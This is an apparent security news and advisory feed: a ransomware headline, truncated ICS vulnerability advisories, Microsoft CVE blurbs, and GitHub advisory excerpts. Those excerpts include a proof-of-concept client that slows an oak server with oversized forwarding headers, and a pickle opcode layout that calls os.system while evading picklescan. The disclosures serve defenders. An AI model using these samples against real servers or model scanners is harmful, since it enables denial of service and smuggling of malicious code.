#web

St. Paul hit by Interlock ransomware attack, 43GB of sensitive data leaked, city refuses ransom, launches Operation Secure…

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 7.1 ATTENTION: Exploitable remotely/low attack complexity Vendor: AVEVA Equipment: PI Integrator Vulnerabilities: Unrestricted Upload of File with Dangerous Type, Insertion of Sensitive Information into Sent Data 2. RISK EVALUATION Successful exploitation of these vulnerabilities could allow an attacker to disclose sensitive information, or upload and execute files. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following AVEVA products are affected: PI Integrator for Business Analytics: Versions 2020 R2 SP1 and prior. 3.2 VULNERABILITY OVERVIEW 3.2.1 UNRESTRICTED UPLOAD OF FILE WITH DANGEROUS TYPE CWE-434 The vulnerability, if exploited, could allow an authenticated miscreant (with privileges to create or access publication targets of type Text File or HDFS) to upload and persist files that could potentially be executed. CVE-2025-54460 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.6 has been calculated; the CVSS vector stri...

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 8.7 ATTENTION: Exploitable remotely/low attack complexity Vendor: Schneider Electric Equipment: EcoStruxure Power Monitoring Expert Vulnerabilities: Path Traversal, Deserialization of Untrusted Data, Server-Side Request Forgery 2. RISK EVALUATION Successful exploitation of these vulnerabilities could allow a remote attacker to read arbitrary files from the target machine, or to access internal services directly. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS Schneider Electric reports the following versions of EcoStruxure Power Monitoring Expert are affected: EcoStruxure Power Monitoring Expert: Version 13.1 3.2 VULNERABILITY OVERVIEW 3.2.1 PATH TRAVERSAL CWE-22 Schneider Electric EcoStruxure Power Monitoring Expert contains a directory traversal vulnerability, which may enable remote code execution when an authenticated attacker with admin privileges uploads a malicious file over HTTP which then gets executed. Authentication is required to exploit th...

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 8.7 ATTENTION: Exploitable remotely/low attack complexity Vendor: Johnson Controls Equipment: iSTAR Ultra, iSTAR Ultra SE, iSTAR Ultra G2, iSTAR, ULTRA G2 SE, iSTAR Edge G2 Vulnerabilities: OS Command Injection, Insufficient Verification of Data Authenticity, Use of Default Credentials, Missing Protection Mechanism for Alternate Hardware Interface, Insecure Storage of Sensitive Information 2. RISK EVALUATION Successful exploitation of these vulnerabilities may allow an attacker to modify firmware and access the space that is protected by the device. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following versions of Software House iSTAR Ultra and Edge door controllers are affected: iSTAR Ultra: Versions 6.9.2.CU02 and prior (CVE-2025-53695, CVE-2025-53696, CVE-2025-53697, CVE-2025-53700) iSTAR Ultra SE: Versions 6.9.2.CU02 and prior (CVE-2025-53695, CVE-2025-53696, CVE-2025-53697, CVE-2025-53700) iSTAR Ultra G2: Versions 6.9.2.CU02 and prior (CVE...

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 8.4 ATTENTION: Low attack complexity Vendor: Ashlar-Vellum Equipment: Cobalt, Xenon, Argon, Lithium, Cobalt Share Vulnerabilities: Out-of-bounds Write, Out-of-bounds Read, Heap-based Buffer Overflow 2. RISK EVALUATION Successful exploitation of these vulnerabilities could allow an attacker to disclose information and execute arbitrary code. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following Ashlar-Vellum products are affected: Cobalt: All versions prior to 12.6.1204.204 Xenon: All versions prior to 12.6.1204.204 Argon: All versions prior to 12.6.1204.204 Lithium: All versions prior to 12.6.1204.204 Cobalt Share: All versions prior to 12.6.1204.204 3.2 VULNERABILITY OVERVIEW 3.2.1 OUT-OF-BOUNDS WRITE CWE-787 In Ashlar-Vellum Cobalt, Xenon, Argon, Lithium, and Cobalt Share versions prior to 12.6.1204.204, the affected applications lack proper validation of user-supplied data when parsing CO files. This could lead to an out-of-bounds write. An ...

**According to the CVSS metric, the privilege required is none (PR:N) and user interaction is none (UI:N). What does that mean for this vulnerability?** An attacker doesn't require any privileges on the systems hosting the web services. Successful exploitation of this vulnerability could cause Remote Code Execution or Information Disclosure on web services that are parsing documents that contain a specially crafted metafile, without the involvement of a victim user.

Deserialization of untrusted data in Visual Studio allows an authorized attacker to execute code locally.

Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Dynamics 365 (on-premises) allows an unauthorized attacker to perform spoofing over a network.

### Summary With specially crafted value of the `x-forwarded-proto` or `x-forwarded-for` headers, it's possible to significantly slow down an oak server. ### Vulnerable Code - https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L87 - https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L142 ### PoC - setup ``` deno --version deno 2.4.3 v8 13.7.152.14-rusty typescript 5.8.3 ``` - `server.ts` ```ts import { Application } from "https://deno.land/x/oak/mod.ts"; const app = new Application({proxy: true}); let i = 1 app.use((ctx) => { // let url = ctx.request.url // test1) x-forwarded-proto let ips = ctx.request.ips // test2) x-forwarded-for console.log(`request ${i} received`) i++; ctx.response.body = "hello"; }); await app.listen({ port: 8080 }); ``` - `client.ts` ```ts const lengths = [2000, 4000, 8000, 16000, 32000, 64000, 128000] const data1 = lengths.map(l => 'A' + 'A'.repeat(l) + 'A'); const data2 = lengths.map(l => 'A' + ' '.repeat(l) + '...

### Details There's a parsing logic error in picklescan and modelscan while trying to deal with opcode `STACK_GLOBAL`. Function `_list_globals` when handling `STACK_GLOBAL` at position `n`, it is expected to track two arguments but in wrong range. The loop only consider the range from `1` to `n-1` but forgets to consider the opcode at position `0`. The correct range should be `0` to `n-1`. Attacker can put arg in position `0`, thus the parser can only tract one argument. Then, the exception https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L281 will be triggered. Thus it can cause detection bypass since the malicious pickle file will trigger unexpected exceptions. Example: ``` 0: S STRING 'os' --> arg 0: STRING (untracked argument due to wrong scanning range) 6: S STRING 'system' --> arg 1: STRING (tracked argument) 16: \x93 STACK_GLOBAL 17: S STRING 'ls' 23: \x85 TUPLE1 24: R RE...